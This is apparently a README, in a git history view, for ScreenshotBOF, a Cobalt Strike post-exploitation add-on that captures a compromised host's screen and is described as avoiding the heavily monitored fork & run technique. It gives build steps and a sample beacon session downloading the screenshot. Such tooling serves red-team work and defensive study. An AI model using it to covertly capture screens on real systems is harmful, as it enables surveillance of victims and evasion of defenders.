ScreenshotBOF/README.md

40 lines
1.5 KiB
Markdown
Raw Normal View History

2022-10-23 01:58:24 -07:00
# ScreenshotBOF
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
2022-10-23 02:38:51 -07:00
## Self Compilation
1. git clone the repo
2. open the solution in Visual Studio
3. Build project BOF
2022-10-23 01:58:24 -07:00
## Usage
1. import the screenshotBOF.cna script into Cobalt Strike
2. use the command screenshot_bof
2022-10-23 02:06:37 -07:00
3. Download the screenshot from the target
2022-10-23 01:58:24 -07:00
```
2022-10-23 02:06:37 -07:00
beacon> screenshot_bof
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 3411 bytes
[+] received output:
[*] Tasked beacon to printscreen and save to disk
[+] received output:
[+] PrintScreen saved to bitmap...
[+] received output:
[+] Printscreen bitmap saved to screenshot.bmp
beacon> download screenshot.bmp
[*] Tasked beacon to download screenshot.bmp
[+] host called home, sent: 22 bytes
[*] started download of C:\screenshot.bmp (12441668 bytes)
[*] download of screenshot.bmp is complete
2022-10-23 01:58:24 -07:00
```
## Notes
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
- in memory downloading of screenshots is planned to be added
- the filename can be changed in the source code.
## Why did I make this?
2022-10-23 02:04:09 -07:00
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
## Credits
- Made using https://github.com/securifybv/Visual-Studio-BOF-template